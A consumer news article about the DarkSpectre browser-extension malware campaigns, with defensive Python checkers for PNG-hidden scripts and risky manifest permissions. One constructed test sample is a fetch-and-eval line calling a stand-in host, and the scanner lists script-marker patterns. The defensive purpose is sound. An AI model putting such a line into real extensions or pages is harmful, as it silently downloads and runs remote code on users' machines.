Browser extension malware infected 8.8 million users in DarkSpectre attack
Browser extensions promise convenience. Many offer simple tools such as new tab pages, translators or video help.
However, researchers discovered a long-running malware operation that abused that trust on a large scale. Koi Security analysts identified the threat while analyzing suspicious infrastructure linked to a campaign known as ShadyPanda. What started as an investigation quickly revealed something much bigger.
The group behind this is now known as DarkSpectre. According to Koi researchers, it infected more than 8.8 million users on Chrome, Edge and Firefox over seven years. This was not a smash and grab attack. It was slow, deliberate and very organized. Instead of submitting malicious code to the extension stores, the group played the long game.
Security researchers say millions of users unknowingly installed browser extensions that later turned malicious after years of appearing legitimate. (Donato Fasano/Getty Images)
One threat actor behind three major campaigns
At first, the activity seemed like separate threats. That changed once Koi analysts followed the infrastructure breadcrumbs. Moving between domains linked to ShadyPanda, Koi researchers discovered shared systems powering multiple groups of extensions. That analysis confirmed that ShadyPanda, GhostPoster and Zoom Stealer were not separate actors. They were one coordinated operation. Together, these campaigns targeted both everyday users and corporate environments.
ShadyPanda
This campaign focused on mass surveillance and affiliate fraud. Researchers estimate that it affected more than 4 million users, and some analysis suggests the total could reach 5.6 million as additional related extensions come online. In several cases, the extensions remained legitimate for more than five years before quietly turning malicious.
GhostPoster
This campaign used a clever trick. It hid malicious code inside image files to bypass security controls. It affected 1.05 million users.
Zoom Stealer
This operation focused on corporate meeting data across more than 28 conferencing platforms. It affected 2.2 million users.
Different goals. Same operator.
How Koi Discovered DarkSpectre’s Hidden Network
The breakthrough came when Koi analysts examined two domains linked to ShadyPanda. Those domains powered legitimate extension features, such as weather widgets and new tab pages. They were not command-and-control servers. That was the trick. Those same clean domains appeared again and again in other extensions that silently connected to a completely different, malicious infrastructure.
One domain led to extensions. Those extensions exposed new domains. Those domains connected to even more extensions. Following that chain allowed Koi to discover over 100 connected extensions across multiple browser stores. Some extensions even reused infrastructure already noted in previous research. That overlap confirmed that DarkSpectre was operating at nation-state scale.
How DarkSpectre stayed hidden for years
DarkSpectre succeeded by combining legitimate functionality with hidden malware. Users got what they expected. Meanwhile, the threat ran silently in the background.
Delayed activation fooled reviewers
Some extensions waited days before triggering malicious behavior. Others activated malware on only a small percentage of page loads. This made detection during store reviews extremely difficult.
Malicious code disguised as images
The group hid JavaScript inside PNG image files. The extension loaded its own logo, extracted the hidden code, and ran it silently.
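A logo that renders correctly can still carry bytes that the image decoder never needs. The check below is an added example, not Koi's tooling or anything from the campaign: it walks a PNG's chunk list, reports any bytes after the IEND chunk and any text-metadata chunks, and flags script-like markers in them. The 1x1 logo and the appended blob are constructed sample data, and the marker list is a heuristic I chose.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Heuristic markers that are rare in real image data but common in scripts (my choice, not a standard).
SCRIPT_MARKERS = (b"function", b"eval(", b"document.", b"chrome.", b"fetch(", b"XMLHttpRequest", b"=>")

def _chunk(ctype, payload):
    """Build one PNG chunk: 4-byte length, type, payload, CRC32 over type + payload."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def make_logo_png():
    """Construct a minimal valid 1x1 grayscale PNG to stand in for an extension logo (sample data)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit depth, colour type 0 (gray)
    idat = zlib.compress(b"\x00\x80")                     # one scanline: filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")

def inspect_png(data):
    """Walk the chunks up to IEND; return counts of hidden bytes, markers found, and a verdict."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos, text_bytes, end = len(PNG_SIG), b"", None
    while pos + 8 <= len(data):
        length, = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        if ctype in (b"tEXt", b"zTXt", b"iTXt"):          # metadata chunks can also carry a payload
            text_bytes += body
        pos += 12 + length                                 # length + type + body + crc
        if ctype == b"IEND":
            end = pos
            break
    if end is None:
        raise ValueError("truncated PNG: no IEND chunk")
    trailing = data[end:]                                  # a decoder never reads past IEND
    hidden = trailing + text_bytes
    markers = [m for m in SCRIPT_MARKERS if m in hidden]
    return {"trailing_bytes": len(trailing), "text_bytes": len(text_bytes),
            "markers": markers, "suspicious": bool(trailing) or bool(markers)}

if __name__ == "__main__":
    clean = make_logo_png()
    # Constructed sample: the same logo with a script blob appended after IEND.
    tampered = clean + b"(function(){fetch('https://example.invalid/c').then(r=>r.text()).then(eval)})();"
    print(inspect_png(clean))      # suspicious: False
    print(inspect_png(tampered))   # suspicious: True
```

Any non-zero trailing byte count deserves a look even without markers, since nothing a browser needs to draw the icon lives past IEND.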
No updates required
Instead of pushing new extension versions, DarkSpectre controlled everything from its servers. The operators could change behavior at any time without alerting users or the stores. Koi researchers noted that this approach gave the attackers long-term flexibility and control.
Why the Zoom Stealer campaign stands out
Most malware focuses on consumer fraud. Zoom Stealer focused on intelligence.
According to Koi analysts, these extensions collected the following:
- Meeting links with built-in passwords
- Meeting IDs, topics and times
- Names, titles, biographies and photographs of speakers
- Company affiliations and brands
Worse still, the data was transmitted in real time. The moment a user joined or viewed a meeting, information flowed. This type of data enables phishing and corporate espionage at scale.
Why browser extensions are still a weak link
Extension marketplaces typically evaluate code only at submission or update time. Koi’s research shows how attackers exploit that model. Once an extension earns trust badges and positive reviews, users stop questioning it. That confidence becomes a weapon. A clean extension today can become a threat tomorrow.
Ways to stay safe from malicious browser extensions
You don’t need to avoid extensions completely. You just need to be careful.
1) Keep your browser updated
Make sure you turn on automatic updates for your browser (e.g. Chrome, Firefox, Edge) so you’re always running the latest version without thinking about it.
2) Check your installed extensions
Remove everything you no longer use. Fewer extensions mean less risk. CyberGuy has step-by-step guides that show you how to safely check and remove browser extensions, making it easy to clean up your browser in just a few minutes. In Chrome, Edge and Firefox, open the menu, go to Extensions or Add-ons, and remove anything you don’t use or trust.
3) Install extensions only from trusted sources
Official browser stores like the Chrome Web Store have rules and review checks to detect bad actors. They are not perfect, but they are still a better option than a random website on the internet. Extensions from unknown websites or third-party downloads are much more likely to hide malware or spyware.
A long-running malware operation quietly abused trusted browser extensions in Chrome, Edge and Firefox, infecting millions of people around the world. (Morteza Nikoubazl/NurPhoto via Getty Images)
4) Have powerful antivirus software
Strong antivirus software can warn you before you install malicious software, such as a suspicious browser extension. The best way to protect yourself from malicious links that install malware and potentially access your private information is to have powerful antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.
Get my picks for the best antivirus protection winners of 2025 for your Windows, Mac, Android, and iOS devices at Cyberguy.com.
5) Invest in personal data deletion services
If your personal data was exposed in this security incident, it is critical to act quickly to reduce the risk of identity theft and scams. A data removal service can help you remove all of this personal information from the Internet.
While no service can guarantee complete removal of your data from the Internet, a data deletion service is truly a smart choice. They are not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically deleting your personal information from hundreds of websites.
It’s what gives me peace of mind and has proven to be the most effective way to delete your personal data from the Internet. By limiting the information available, you reduce the risk of scammers cross-referencing leaked data with information they can find on the dark web, making it harder for them to target you.
Check out my top picks for data removal services and get a free scan to find out if your personal information is already available on the web by visiting Cyberguy.com.
6) Be skeptical of extensions that request unnecessary access
Some extensions go overboard on purpose. A calculator tool that asks for your browsing history or a weather app that asks for your login details is a big red flag. Before installing, ask: “Does this permission match what the extension does?” If the answer is no, do not install it. Be wary of broad permissions like “Read and change all your data on the websites you visit” unless clearly justified (e.g. a password manager). If an update suddenly adds new permission requests, find out why. It could mean that the extension has been sold or hijacked.
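The permission question above can be asked of the extension's manifest.json directly. The audit below is an added example, not CyberGuy's or any browser vendor's tool: it flags host patterns that grant access to every site and API permissions that expose history, traffic or credentials. The permission and match-pattern names are real Chrome ones; which of them count as "sensitive" is my own heuristic, and the two calculator manifests are constructed samples.

```python
import json
import os

# Match patterns that grant access to every website (real Chrome match-pattern forms).
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# API permissions worth questioning in a small utility (real Chrome names; the selection is mine).
SENSITIVE_APIS = {"history", "tabs", "webRequest", "webRequestBlocking", "cookies", "debugger",
                  "management", "nativeMessaging", "clipboardRead", "scripting",
                  "declarativeNetRequest"}

def audit_manifest(manifest):
    """Return a list of findings for one parsed manifest.json (MV2 and MV3 layouts both handled)."""
    perms = set(manifest.get("permissions", [])) | set(manifest.get("optional_permissions", []))
    # MV2 lists host patterns under "permissions"; MV3 moves them to "host_permissions".
    hosts = set(manifest.get("host_permissions", [])) | {p for p in perms if "/" in p or p == "<all_urls>"}
    for script in manifest.get("content_scripts", []):     # content scripts carry their own match list
        hosts |= set(script.get("matches", []))
    findings = []
    if hosts & BROAD_HOSTS:
        findings.append("runs on every website: " + ", ".join(sorted(hosts & BROAD_HOSTS)))
    for api in sorted(perms & SENSITIVE_APIS):
        findings.append("sensitive API: " + api)
    return findings

def audit_directory(root):
    """Audit every manifest.json under a folder, e.g. an unpacked extension or a profile's Extensions dir."""
    report = {}
    for dirpath, _, files in os.walk(root):
        if "manifest.json" in files:
            with open(os.path.join(dirpath, "manifest.json"), encoding="utf-8") as fh:
                report[dirpath] = audit_manifest(json.load(fh))
    return report

# Constructed samples: a calculator asking for far more than arithmetic needs, and a modest one.
OVERREACHING = {"manifest_version": 3, "name": "Quick Calculator",
                "permissions": ["storage", "history", "scripting"],
                "host_permissions": ["<all_urls>"]}
MODEST = {"manifest_version": 3, "name": "Quick Calculator", "permissions": ["storage"]}

if __name__ == "__main__":
    for m in (OVERREACHING, MODEST):
        print(m["name"], audit_manifest(m) or ["no risky permissions"])
```

A finding is a prompt to ask whether the feature needs it, not a verdict: a password manager legitimately needs broad host access, a calculator does not.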
7) Change your passwords and do it securely
If you’ve ever saved passwords in your browser (for example, through the browser’s built-in password manager or the “Save Password” prompt), those credentials could be at risk if a malicious extension is installed. These built-in managers store passwords locally or in your Google, Microsoft or Firefox account, and a compromised browser can give criminals a way in.
This typically doesn’t apply to dedicated password manager extensions, which encrypt your data independently and don’t rely on browser storage. However, if you’re unsure whether an extension has been compromised, it’s always smart to update your master password and enable two-factor authentication.
For maximum security, change your most important passwords (email, banking, shopping, cloud services) from a different, secure device, such as your phone or another computer where the questionable extension was never installed. Avoid using the same browser that may have been exposed. Then, consider switching to a password manager to create and store unique, secure logins for the future.
Next, check whether your email has been exposed in previous breaches. Our #1 password manager pick includes a built-in breach scanner that checks if your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords and protect those accounts with new, unique credentials.
Check out the best expert-reviewed password managers of 2025 at Cyberguy.com.
Analysts discovered a coordinated campaign that hid spyware inside everyday browser tools, such as new tab pages and translators. (Morteza Nikoubazl/NurPhoto via Getty Images)
8) Watch for behavioral changes
Subtle changes often appear before obvious damage occurs. Sudden redirects, new tabs that open on their own, unfamiliar search results, pop-ups, slower browsing, or websites that ask you to log in again unexpectedly may indicate a malicious or compromised extension. Pay attention if ads appear where they never did before or if your browser settings change without your intervention.
Koi’s research shows how attackers rely on patience. Once an extension gains trust and remains silent for years, users stop noticing it. That makes small behavioral changes easy to overlook. If something feels wrong, don’t ignore it. Disable the extensions one by one to identify the culprit. If the problem disappears, remove that extension permanently.
When in doubt, trust your instincts. Browsers shouldn’t surprise you.
Kurt’s Key Takeaways
DarkSpectre is a reminder that online threats are getting smarter and quieter. This was not a smash and grab attack. It developed slowly, over years, and was built on trust that most people never think twice about. Koi analysts connected the dots by tracking shared infrastructure between campaigns, but also warn that some dormant extensions may still be installed and trusted today. Browser extensions can be useful, but each additional add-on is another door into your browser. Paying attention, cleaning the house from time to time, and questioning what you install can make a real difference.
When was the last time you checked what your browser extensions actually do behind the scenes? Let us know by writing to us at Cyberguy.com.
Copyright 2025 CyberGuy.com. All rights reserved.
Kurt “CyberGuy” Knutsson is an award-winning technology journalist with a deep love for technology, gear and gadgets that improve lives, with contributions to News and News Business since mornings on “News & Friends.” Do you have a technical question? Get Kurt’s free CyberGuy newsletter, share your voice, a story idea or a comment at CyberGuy.com.